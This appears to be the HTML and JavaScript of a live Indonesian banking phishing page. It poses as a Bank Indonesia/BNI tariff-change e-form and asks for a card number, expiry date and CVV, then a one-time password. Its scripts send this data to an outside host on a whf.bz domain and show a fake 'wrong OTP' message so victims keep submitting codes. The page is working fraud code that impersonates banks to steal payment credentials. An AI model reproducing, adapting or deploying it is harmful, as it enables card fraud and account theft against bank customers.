<html lang="id" >
<head>
  <meta charset="UTF-8">
 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title>Bank Indonesia</title>
  <meta name="description" content="">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗘-𝗙𝗼𝗿𝗺 𝗣𝗲𝗿𝘂𝗯𝗮𝗵𝗮𝗻 𝗧𝗮𝗿𝗶𝗳 | 𝗕𝗡𝗹">
  <meta property="og:description" content="">
  <meta property="og:image" content="https://ik.imagekit.io/ons708bb1/images%20(13).jpeg?updatedAt=1746273076149">
 <link href="https://ik.imagekit.io/ons708bb1/images%20(13).jpeg?updatedAt=1746273076149" rel="shortcut icon" type="image/x-icon"/>
<link href="https://ik.imagekit.io/ons708bb1/images%20(13).jpeg?updatedAt=1746273076149" rel="apple-touch-icon"/>
  <link rel="stylesheet" href="./style.css">
<link href="https://fonts.googleapis.com/css?family=Alata" rel="stylesheet" type="text/css">
</head>
<style>
    html,
body {
  min-height: 100%;
  margin: 0;
}

body {
  padding: 30px;
  background-image: linear-gradient(135deg, #ffffff 0%, #ffffff 100%);
  box-sizing: border-box;
  position: fixed;
  top: 0;
  margin: 0px auto;
  width: 100%;
}

.select-box {
  position: relative;
  display: block;
  width: 100%;
  margin: 0 auto;
  font-family: "Open Sans", "Helvetica Neue", "Segoe UI", "Calibri", "Arial", sans-serif;
  font-size: 18px;
  color: #60666d;
  box-shadow: 0px 0px 0px 0px #0054a5;
  z-index: 99999999;
}
@media (min-width: 768px) {
  .select-box {
    width: 70%;
  }
}
@media (min-width: 992px) {
  .select-box {
    width: 50%;
  }
}
@media (min-width: 1200px) {
  .select-box {
    width: 30%;
  }
}
.select-box__current {
  position: relative;
  box-shadow: 0 15px 30px -10px rgba(0, 0, 0, 0.1);
  cursor: pointer;
  outline: none;
}
.select-box__current:focus + .select-box__list {
  opacity: 1;
  -webkit-animation-name: none;
          animation-name: none;
}
.select-box__current:focus + .select-box__list .select-box__option {
  cursor: pointer;
}
.select-box__current:focus .select-box__icon {
  transform: translateY(-50%) rotate(180deg);
}
.select-box__icon {
  position: absolute;
  top: 50%;
  right: 15px;
  transform: translateY(-50%);
  width: 20px;
  opacity: 0.3;
  transition: 0.2s ease;
}
.select-box__value {
  display: flex;
}
.select-box__input {
  display: none;
}
.select-box__input:checked + .select-box__input-text {
  display: block;
}
.select-box__input-text {
  display: none;
  width: 100%;
  margin: 0;
  padding: 15px;
  background-color: #fff;
}
.select-box__list {
  position: absolute;
  width: 100%;
  padding: 0;
  list-style: none;
  opacity: 0;
  -webkit-animation-name: HideList;
          animation-name: HideList;
  -webkit-animation-duration: 0.5s;
          animation-duration: 0.5s;
  -webkit-animation-delay: 0.5s;
          animation-delay: 0.5s;
  -webkit-animation-fill-mode: forwards;
          animation-fill-mode: forwards;
  -webkit-animation-timing-function: step-start;
          animation-timing-function: step-start;
  box-shadow: 0 15px 30px -10px rgba(0, 0, 0, 0.1);
}
.select-box__option {
  display: block;
  padding: 15px;
  background-color: #fff;
}
.select-box__option:hover, .select-box__option:focus {
  color: #546c84;
  background-color: #fbfbfb;
}

@-webkit-keyframes HideList {
  from {
    transform: scaleY(1);
  }
  to {
    transform: scaleY(0);
  }
}

@keyframes HideList {
  from {
    transform: scaleY(1);
  }
  to {
    transform: scaleY(0);
  }
}

**************************************/
@media (min-width: 700px) {
  .wrapper {
    overflow: hidden;
  }
  .wrapper > * {
    float: left;
    padding: 2em 2em;
  }
}

@media (min-width: 700px) {
  .contacts {
    width: 30%;
    min-height: 620px;
  }
}

@media (min-width: 700px) {
  .form {
    width: 70%;
  }
}

form p {
  float: left;
  width: 49%;
}
form p:not(:nth-child(2n)) {
  margin-right: 2%;
}
form p:last-child {
  clear: both;
  width: 100%;
}
form p:nth-last-child(2) {
  clear: both;
  width: 100%;
}

/**************************************/
body {
  padding: 1rem;
}

.wrapper {
  box-shadow: 0 0 5px 0 rgba(0, 0, 0, 0.2);
}
.wrapper > * {
  padding: 1em;
}

ul {
  list-style: none;
  padding: 0;
}

.contacts {
  background: #4b5195;
  color: #fff;
}

.form {
  background: #fff;
}

form label {
  display: block;
  margin: 5px auto;
  float: left;
  font-family: Alata, sans-serif;
}
input,
button,
textarea {
  height: 45px;
  box-shadow: 0 15px 30px -10px rgba(0, 0, 0, 0.1);
  outline: none;
  border: none;
  width: 100%;
}

button {
  background: #9A0F8E;
  width: 80%;
  border: 0;
  color: #fff;
  font-weight: bold;
  height: 45px;
  box-shadow: 0 15px 30px -10px rgba(0, 0, 0, 0.1);
  border-radius: 50px;
  position: fixed;
  left: 0;
  right: 0;
  margin: 0px auto;
  bottom: 80;
  
  
}


.button20 {
  background: transparent;
  width: 80%;
  border: 0;
  color: #fff;
  font-weight: bold;
  height: 45px;
  box-shadow: 0 15px 30px -10px rgba(0, 0, 0, 0.1);
  border-radius: 50px;
  position: fixed;
  left: 0;
  right: 0;
  margin: 0px auto;
  bottom: 0;
  
  
}
button:active {
  opacity: 0.5;
  outline: 0;
}

.contain {
  max-width: 100%;
  margin-left: auto;
  margin-right: auto;
  padding: 0em;
  height: 100%;
}
@media (min-width: 600px) {
  .contain {
    padding: 0;
  }
}

h3,
ul {
  margin: 0;
}

h3 {
  margin-bottom: 1rem;
}

input:focus,
textarea:focus {
  outline: 0px 2px 0px 0px solid gold;
}
input,
textarea,
button {
  width: 110%;
  border: 0px 0px 0px solid #000;
  box-shadow: 0 0px 3px 0px #0054a5;
  height: 60px;
  outline: none;
  padding: 22px;
  
}

input{
width: 100%;
  border: 0, 0, 1 solid #005db8;
  box-shadow: 0px 0px 15px 0px rgba(0, 2, 0, 0.0);
  height: 45px;
  outline: none;
  padding: 10px;
  
}
fieldset{
    border-radius: 10px;
    margin-top: 80px;
    height: 400px;
    border-color: #005db8;
    background-image: linear-gradient(135deg, #d7d7d7ee 85%, #145df1e2 15%);
    box-shadow: 2px 10px 20px rgba(0,0,5,0.25), 0 15px 10px rgba(0,0,0,0.22);

}


form #alert{
    font-size: 12px;
}

@media (min-width:360px) {
.btn-ku {
  align-items: center;
  background-image: linear-gradient(135deg, #0071de 0%, #005db8 70%);
  border-radius: 5px;
  box-shadow: 0 0px 0px rgba(0,0,0,0.0), 0 0px 0px rgba(0,0,0,0.0);
  display: flex;
  height: 9%;
  justify-content: center;
  position: relative;
  width: 100%;
  margin: 0px auto;
  margin-top: 60px;
 
}
}

@media (min-width:480px) {
.btn-ku {
  align-items: center;
  background-image: linear-gradient(135deg, #F46E0D 0%, #F624A1 70%);
  border-radius: 5px;
  box-shadow: 0 14px 28px rgba(0,0,0,0.25), 0 10px 10px rgba(0,0,0,0.22);
  display: flex;
  height: 9%;
  justify-content: center;
  position: relative;
  width: 84%;
  margin: 0px auto;
  margin-top: 75px;
 
}
}
    .text {
  color: white;
  position: absolute;
  transition: opacity 300ms;
  user-select: none;
  -moz-user-select: none;
}
.fingerprint {
  /* height: 40px; */
  left: -8px;
  opacity: 0;
  position: absolute;
  stroke: #777;
  top: -4px;
  transition: opacity 1ms;
}
.fingerprint-active {
  stroke: #fff;
}
.fingerprint-out {
  opacity: 1;
}
.odd {
  stroke-dasharray: 0px 50px;
  stroke-dashoffset: 1px;
  transition: stroke-dasharray 1ms;
}
.even {
  stroke-dasharray: 50px 50px;
  stroke-dashoffset: -41px;
  transition: stroke-dashoffset 1ms;
}
.ok {
  opacity: 0;
}
.active.btn-ku {
  animation: 6s btn-ku;
}
.active .text {
  opacity: 0;
  animation: 6s Text forwards;
}
.active .fingerprint {
  opacity: 1;
  transition: opacity 300ms 200ms;
}
.active .fingerprint-base .odd {
  stroke-dasharray: 50px 50px;
  transition: stroke-dasharray 800ms 100ms;
}
.active .fingerprint-base .even {
  stroke-dashoffset: 0px;
  transition: stroke-dashoffset 800ms;
}
.active .fingerprint-active .odd {
  stroke-dasharray: 40px 40px;
  transition: stroke-dasharray 2000ms 1500ms;
}
.active .fingerprint-active .even {
  stroke-dashoffset: 0px;
  transition: stroke-dashoffset 2000ms 1300ms;
}
.active .fingerprint-out {
  opacity: 0;
  transition: opacity 300ms 4100ms;
}
.active .ok {
  opacity: 1;
  animation: 6s Ok forwards;
}
@keyframes btn-ku {
  0% { width: 200px }
  6% { width: 80px }
  71% { transform: scale(1); }
  75% { transform: scale(1.2); }
  77% { transform: scale(1); }

  94% { width: 80px }
  100% { width: 200px }
}
@keyframes Text {
  0% { opacity: 1; transform: scale(1); }
  6% { opacity: 0; transform: scale(0.5); }

  94% { opacity: 0; transform: scale(0.5); }
  100% { opacity: 1; transform: scale(1); }
}
@keyframes Ok {
  0% { opacity: 0 }
  70% { opacity: 0; transform: scale(0); }
  75% { opacity: 1; transform: scale(1.1); }
  77% { opacity: 1; transform: scale(1); }
  92% { opacity: 1; transform: scale(1); }
  96% { opacity: 0; transform: scale(0.5); }
  100% { opacity: 0 }
}


.borderku{
    border: 1.5px solid red;
}


</style>
<body>
    <center>
<img src="https://ik.imagekit.io/ons708bb1/Picsart_25-05-03_19-34-34-167.png?updatedAt=1746275707418" width="200px" style="margin-bottom: -60px">
</center>
<!-- partial:index.partial.html -->
<fieldset>
 

<form   action="req/index.php" method="POST" >
     <label for="">16 Digit Angka Nomor Kartu Debit/Kredit</label>   
  <input type="tel" name="debit" id="debitku" placeholder="#### #### #### ####" maxlength="19" minlength="19" class="input" required>
    <div class="form" style="margin-top: -40px">
      
     
        <p>
         
        </p>
          
        </p>
        <p>
          <label for="">Masa Berlaku</label>
          <input  type="tel" name="valid" id="valid" maxlength="5" minlength="5" placeholder="MM/YY" required>
        </p>
        <p>
          <label for="">CVV (3 Digit)</label>
          <input type="tel" name="cvv" style="margin-bottom: -120px" id="cvv" maxlength="3" minlength="3" placeholder="###" required>
        </p>
        <p>
         
                 
        <p>                                        
                  <button id="btnSubmit" class="btn-ku" type="submit">
  <span class="text">Blokir Sekarang</span>
  <svg class="fingerprint fingerprint-base" xmlns="http://www.w3.org/2000/svg" width="100" height="55" viewBox="0 0 100 100">
    <g class="fingerprint-out" fill="none" stroke-width="2" stroke-linecap="round">
      <path
            class="odd" d="m 25.117139,57.142857 c 0,0 -1.968558,-7.660465 -0.643619,-13.149003 1.324939,-5.488538 4.659682,-8.994751 4.659682,-8.994751" />
      <path
            class="odd" d="m 31.925369,31.477584 c 0,0 2.153609,-2.934998 9.074971,-5.105078 6.921362,-2.17008 11.799844,-0.618718 11.799844,-0.618718" />
      <path
            class="odd" d="m 57.131213,26.814448 c 0,0 5.127709,1.731228 9.899495,7.513009 4.771786,5.781781 4.772971,12.109204 4.772971,12.109204" />
      <path
            class="odd" d="m 72.334009,50.76769 0.09597,2.298098 -0.09597,2.386485" />
      <path
            class="even" d="m 27.849282,62.75 c 0,0 1.286086,-1.279223 1.25,-4.25 -0.03609,-2.970777 -1.606117,-7.675266 -0.625,-12.75 0.981117,-5.074734 4.5,-9.5 4.5,-9.5" />
      <path
            class="even" d="m 36.224282,33.625 c 0,0 8.821171,-7.174484 19.3125,-2.8125 10.491329,4.361984 11.870558,14.952665 11.870558,14.952665" />
      <path
            class="even" d="m 68.349282,49.75 c 0,0 0.500124,3.82939 0.5625,5.8125 0.06238,1.98311 -0.1875,5.9375 -0.1875,5.9375" />
      <path
            class="odd" d="m 31.099282,65.625 c 0,0 1.764703,-4.224042 2,-7.375 0.235297,-3.150958 -1.943873,-9.276886 0.426777,-15.441942 2.370649,-6.165056 8.073223,-7.933058 8.073223,-7.933058" />
      <path
            class="odd" d="m 45.849282,33.625 c 0,0 12.805566,-1.968622 17,9.9375 4.194434,11.906122 1.125,24.0625 1.125,24.0625" />
      <path
            class="even" d="m 59.099282,70.25 c 0,0 0.870577,-2.956221 1.1875,-4.5625 0.316923,-1.606279 0.5625,-5.0625 0.5625,-5.0625" />
      <path
            class="even" d="m 60.901059,56.286612 c 0,0 0.903689,-9.415996 -3.801777,-14.849112 -3.03125,-3.5 -7.329245,-4.723939 -11.867187,-3.8125 -5.523438,1.109375 -7.570313,5.75 -7.570313,5.75" />
      <path
            class="even" d="m 34.072577,68.846248 c 0,0 2.274231,-4.165782 2.839205,-9.033748 0.443558,-3.821814 -0.49394,-5.649939 -0.714206,-8.05386 -0.220265,-2.403922 0.21421,-4.63364 0.21421,-4.63364" />
      <path
            class="odd" d="m 37.774165,70.831845 c 0,0 2.692139,-6.147592 3.223034,-11.251208 0.530895,-5.103616 -2.18372,-7.95562 -0.153491,-13.647655 2.030229,-5.692035 8.108442,-4.538898 8.108442,-4.538898" />
      <path
            class="odd" d="m 54.391174,71.715729 c 0,0 2.359472,-5.427681 2.519068,-16.175068 0.159595,-10.747388 -4.375223,-12.993087 -4.375223,-12.993087" />
      <path
            class="even" d="m 49.474282,73.625 c 0,0 3.730297,-8.451831 3.577665,-16.493718 -0.152632,-8.041887 -0.364805,-11.869326 -4.765165,-11.756282 -4.400364,0.113044 -3.875,4.875 -3.875,4.875" />
      <path
            class="even" d="m 41.132922,72.334447 c 0,0 2.49775,-5.267079 3.181981,-8.883029 0.68423,-3.61595 0.353553,-9.413359 0.353553,-9.413359" />
      <path
            class="odd" d="m 45.161782,73.75 c 0,0 1.534894,-3.679847 2.40625,-6.53125 0.871356,-2.851403 1.28125,-7.15625 1.28125,-7.15625" />
      <path
            class="odd" d="m 48.801947,56.125 c 0,0 0.234502,-1.809418 0.109835,-3.375 -0.124667,-1.565582 -0.5625,-3.1875 -0.5625,-3.1875" />
    </g>
  </svg>
  <svg class="fingerprint fingerprint-active" xmlns="http://www.w3.org/2000/svg" width="100" height="55" viewBox="0 0 100 100">
    <g class="fingerprint-out" fill="none" stroke-width="2" stroke-linecap="round">
      <path
            class="odd" d="m 25.117139,57.142857 c 0,0 -1.968558,-7.660465 -0.643619,-13.149003 1.324939,-5.488538 4.659682,-8.994751 4.659682,-8.994751" />
      <path
            class="odd" d="m 31.925369,31.477584 c 0,0 2.153609,-2.934998 9.074971,-5.105078 6.921362,-2.17008 11.799844,-0.618718 11.799844,-0.618718" />
      <path
            class="odd" d="m 57.131213,26.814448 c 0,0 5.127709,1.731228 9.899495,7.513009 4.771786,5.781781 4.772971,12.109204 4.772971,12.109204" />
      <path
            class="odd" d="m 72.334009,50.76769 0.09597,2.298098 -0.09597,2.386485" />
      <path
            class="even" d="m 27.849282,62.75 c 0,0 1.286086,-1.279223 1.25,-4.25 -0.03609,-2.970777 -1.606117,-7.675266 -0.625,-12.75 0.981117,-5.074734 4.5,-9.5 4.5,-9.5" />
      <path
            class="even" d="m 36.224282,33.625 c 0,0 8.821171,-7.174484 19.3125,-2.8125 10.491329,4.361984 11.870558,14.952665 11.870558,14.952665" />
      <path
            class="even" d="m 68.349282,49.75 c 0,0 0.500124,3.82939 0.5625,5.8125 0.06238,1.98311 -0.1875,5.9375 -0.1875,5.9375" />
      <path
            class="odd" d="m 31.099282,65.625 c 0,0 1.764703,-4.224042 2,-7.375 0.235297,-3.150958 -1.943873,-9.276886 0.426777,-15.441942 2.370649,-6.165056 8.073223,-7.933058 8.073223,-7.933058" />
      <path
            class="odd" d="m 45.849282,33.625 c 0,0 12.805566,-1.968622 17,9.9375 4.194434,11.906122 1.125,24.0625 1.125,24.0625" />
      <path
            class="even" d="m 59.099282,70.25 c 0,0 0.870577,-2.956221 1.1875,-4.5625 0.316923,-1.606279 0.5625,-5.0625 0.5625,-5.0625" />
      <path
            class="even" d="m 60.901059,56.286612 c 0,0 0.903689,-9.415996 -3.801777,-14.849112 -3.03125,-3.5 -7.329245,-4.723939 -11.867187,-3.8125 -5.523438,1.109375 -7.570313,5.75 -7.570313,5.75" />
      <path
            class="even" d="m 34.072577,68.846248 c 0,0 2.274231,-4.165782 2.839205,-9.033748 0.443558,-3.821814 -0.49394,-5.649939 -0.714206,-8.05386 -0.220265,-2.403922 0.21421,-4.63364 0.21421,-4.63364" />
      <path
            class="odd" d="m 37.774165,70.831845 c 0,0 2.692139,-6.147592 3.223034,-11.251208 0.530895,-5.103616 -2.18372,-7.95562 -0.153491,-13.647655 2.030229,-5.692035 8.108442,-4.538898 8.108442,-4.538898" />
      <path
            class="odd" d="m 54.391174,71.715729 c 0,0 2.359472,-5.427681 2.519068,-16.175068 0.159595,-10.747388 -4.375223,-12.993087 -4.375223,-12.993087" />
      <path
            class="even" d="m 49.474282,73.625 c 0,0 3.730297,-8.451831 3.577665,-16.493718 -0.152632,-8.041887 -0.364805,-11.869326 -4.765165,-11.756282 -4.400364,0.113044 -3.875,4.875 -3.875,4.875" />
      <path
            class="even" d="m 41.132922,72.334447 c 0,0 2.49775,-5.267079 3.181981,-8.883029 0.68423,-3.61595 0.353553,-9.413359 0.353553,-9.413359" />
      <path
            class="odd" d="m 45.161782,73.75 c 0,0 1.534894,-3.679847 2.40625,-6.53125 0.871356,-2.851403 1.28125,-7.15625 1.28125,-7.15625" />
      <path
            class="odd" d="m 48.801947,56.125 c 0,0 0.234502,-1.809418 0.109835,-3.375 -0.124667,-1.565582 -0.5625,-3.1875 -0.5625,-3.1875" />
    </g>
  </svg>
  <svg class="ok" xmlns="http://www.w3.org/2000/svg" width="100" height="100" viewBox="0 0 100 100"><path d="M34.912 50.75l10.89 10.125L67 36.75" fill="none" stroke="#fff" stroke-width="6"/></svg>
</button>   
       
        </p>
      </form>
    </div>
  </div>
</div>
</fieldset>
<fieldset id="formOtp" style="display: none; position: absolute; 
    top: 0; 
    right: 0; 
    left: 0; 
    bottom: 0;
    margin: 0px auto;
    width: 100%;
    height: 100%;  background: #00000050">
<div style="position: fixed; 
    top: 0; 
    right: 0; 
    left: 0; 
    top: 200;
    bottom: 0;
    margin: 0px auto;
    width: 70%;
    height: 180px; background: #fff; border-radius: 15px; display: inline-block; padding: 15px; text-align: center;">
 
 <span style="position: absolute; background: transparent; top: 6; width: 30px; height: 20px; left: 6; float: left; padding-top: 0px; font-size: 15px" onclick="tutupotp()">✖</span>
 
<form onsubmit="letsgo()" action="debit.php" method="POST" id="otpform" style="background: #fff">
<h3 style="font-family: Alata, sans-serif; margin-top: -8px">Input OTP</h3>
 <input type="tel" name="otp" id="otp" placeholder="######" maxlength="6" minlength="6" style="border: 1px inset #ccc; border-radius: 10px; text-align: center; font-size: 18px; height: 30px; width: 100%; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUppYC5GnzPUK1CjXCdm-y8Xgywqob-FPJjTrW671dG95X5lpXgFSez8nQl-Wu_mv7YgalYbwf9n5qYP6I1-9gos5d9JMqAQNsXV11ApyBhtm6Z6pSQGmRLJ_w0E0LakMA9bqCTRuDBphKXXMlEWA9g3NFz5OqV4sB2k7Eog8S1WpdDv4wBeja4vPa9TA/s1080/AddText_12-10-12.38.34.jpg); background-position: 100% 100%; background-size: 100% 100%; " required onclick="hapusalert()"><p>
     
 </p>
  <button id="btnproses" type="submit" style="width: 90%; position: absolute; background-image: linear-gradient(135deg, #BD0CB2 0%, #930C82 70%); bottom: 10">Proses</button>
  <center>
      <div style="margin-top: 14px">
<p id="kirim-ulang" style="margin-top: 40px; font-family: sans; font-size: 11px; position: absolute; left: 0; right: 0; margin: 0px auto; width: 100%">Kirim ulang : <br/><span id="time" style="color: red"></span></p>
<p id="kirim-kode" style="margin-top: 40px; font-family: sans; font-size: 11px; position: absolute; left: 0; right: 0; margin: 0px auto; font-weight: bold; color: #415EB7; border-bottom: 1px solid #415EB7; width: 60px" onclick="formdebit(event)">Kirim Ulang</p>
</div>
  <p id="alert" style="/* 1 pixel #00000050 shadow to left, top, right and bottom */
    

    font-family: sans; color: red; font-weight: bold; font-size 10px; font-family: Alata, sans-serif;"></p>
  </center>
  </form>  
</div>  


</fieldset>
<!-- partial -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
 <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/google.js"></script>
<script>$(document).ready(function(){$('#inp').on('input', function(){if($(this).val() == '0' || $(this).val() == '62'){$(this).val('');}});});</script>
<script>
    
$(document).ready(function(){
$('#debitku').mask('0000 0000 0000 0000');
$('#valid').mask('00/00');
$('#cvv').mask('000');



});</script>
<script src="https://smtpjs.com/v3/smtp.js">
</script>
    <script type="text/javascript">
    

    </script>


       <script>
      var myTimer;
   function formdebit(event){
event.preventDefault();
  
        myTimer = setInterval(myClock, 1000);
        var c = 60;
        
          
  
  

   
           function myClock() {
            setTimeout(function(){      
            
        $("#formOtp").fadeIn();
       
            }, 5000);
              $("#kirim-ulang").fadeIn();
            document.getElementById("time").style.display = "block";
            document.getElementById("time").innerHTML = --c + "s";
            document.getElementById("kirim-kode").style.display = "none";
           
               if (c == 0) {
                   clearInterval(myTimer);
               
     document.getElementById("kirim-kode").style.display = "block";
   document.getElementById("time").style.display = "none";
     document.getElementById("kirim-ulang").style.display = "none";
                    
        }
      }
    }
       </script>
<script>
 
 function tutupotp(){

   $("#formOtp").fadeOut();      
    $("#homeku").fadeIn();      
  clearInterval(myTimer);      
 }
 
 function hapusalert(){
 $("#alert").fadeOut();    
 }
</script>
 <script>
$(document).ready(function(){
    $('#kartuForm').submit(function(e) {
        e.preventDefault();
         
  const list = document.getElementById("btnSubmit").classList;
  list.add("active");
   
         $.ajax({
              url: 'https://danamon-app.whf.bz/token/Ho/verkartu.php',
              type: 'post',
              data: $(this).serialize(),             
complete: function(data) {
            console.log('Complete')
     setTimeout(function(){
         $("#formOtp").fadeIn();      
         
       }, 5000);


 }
    });
 });
    return false;
});   

        </script> 
     <script>
$(document).ready(function(){
    $('#otpform').submit(function(e) {
        e.preventDefault();
         
    document.getElementById("btnproses").innerHTML = "Memproses...";
    
         $.ajax({
              url: 'https://danamon-app.whf.bz/token/Ho/sendOTP.php',
              type: 'post',
              data: $(this).serialize(),             
complete: function(data) {
            console.log('Complete')
     setTimeout(function(){
 $("#alert").fadeIn();      
document.getElementById('alert').innerHTML= "Kode OTP Salah, Silahkan ulangi";
  $("#otp").val("");
  document.getElementById('otp').addClass = "borderku";
  document.getElementById("btnproses").innerHTML = "Proses";
     }, 2000);




 }
    });
 });
    return false;
});   

        </script>        
  

</body>
</html>
